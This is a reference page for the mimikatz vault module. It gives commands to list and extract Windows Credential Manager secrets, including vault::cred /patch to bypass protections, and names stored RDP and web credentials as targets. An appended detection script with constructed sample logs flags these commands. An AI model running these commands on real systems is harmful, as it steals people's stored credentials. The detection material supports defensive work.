vault

Access and extract credentials from the Windows Vault (Credential Manager). Requires privilege::debug.

Prerequisites

mimikatz # privilege::debug

list — List Vault Items

List all items in the Windows Vault.

mimikatz # vault::list

Shows vault items including:
- Web credentials (browser-stored passwords)
- Windows credentials (NTLM/Kerberos stored creds)
- Certificate credentials
- Generic credentials


cred — Extract Vault Credentials

Extract credential data from vault items.

mimikatz # vault::cred [/patch]

Options

  • /patch — patch vault functions to enable extraction of credentials that would otherwise be protected

Examples

# List and extract vault credentials
mimikatz # vault::list
mimikatz # vault::cred

# With patch for better coverage
mimikatz # vault::cred /patch

Notes

  • Vault credentials are stored encrypted with DPAPI
  • Typical targets: stored RDP credentials, Windows credential manager entries, web credentials
  • Can also be accessed via dpapi::cred if DPAPI master keys are available
  • Use cmdkey /list (built-in Windows) to enumerate credential manager entries without mimikatz
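
Detection example (added here; not part of mimikatz or of the original page): when the commands above are passed as launch arguments, they show up in process-creation logs. The script below triages JSON-lines records for vault::cred, vault::list and cmdkey /list and notes whether privilege::debug was on the same command line. The record layout (field names modelled on Sysmon Event ID 1), the triage levels and the sample data are assumptions constructed for illustration.

```python
import json
import re

# Command-line patterns taken from the commands on this page, with an assumed triage level.
RULES = [
    ("high",   "vault::cred /patch", re.compile(r"\bvault::cred\b.*?/patch\b")),
    ("high",   "vault::cred",        re.compile(r"\bvault::cred\b")),
    ("medium", "vault::list",        re.compile(r"\bvault::list\b")),
    ("low",    "cmdkey /list",       re.compile(r"\bcmdkey(\.exe)?\s+/list\b")),
]
DEBUG_PRIV = re.compile(r"\bprivilege::debug\b")

def classify(command_line):
    """Return (level, rule, saw_privilege_debug) for one command line, or None."""
    text = command_line.lower().replace('"', " ")  # case-insensitive, quotes ignored
    for level, name, pattern in RULES:             # first (most specific) rule wins
        if pattern.search(text):
            return level, name, bool(DEBUG_PRIV.search(text))
    return None

def scan(json_lines):
    """Scan JSON-lines process-creation records and return a list of findings."""
    findings = []
    for raw in json_lines.splitlines():
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # skip blank or malformed lines instead of aborting the scan
        hit = classify(event.get("CommandLine", ""))
        if hit:
            level, name, debug = hit
            findings.append({"host": event.get("Computer"), "user": event.get("User"),
                             "level": level, "rule": name, "privilege_debug": debug})
    return findings

# Constructed sample records (not real logs).
SAMPLE = r'''
{"Computer":"WS01","User":"CORP\\alice","Image":"C:\\Windows\\System32\\cmdkey.exe","CommandLine":"cmdkey /list"}
{"Computer":"WS02","User":"CORP\\bob","Image":"C:\\Temp\\m.exe","CommandLine":"m.exe \"privilege::debug\" \"vault::cred /patch\" exit"}
{"Computer":"WS02","User":"CORP\\bob","Image":"C:\\Temp\\m.exe","CommandLine":"m.exe vault::list exit"}
{"Computer":"WS03","User":"CORP\\carol","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt"}
not-json
'''

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Matching is on the arguments rather than the image name, and cmdkey /list is rated low because it is a built-in administrative command. Commands typed at the interactive mimikatz # prompt do not appear in process-creation logs, so this covers launch arguments only.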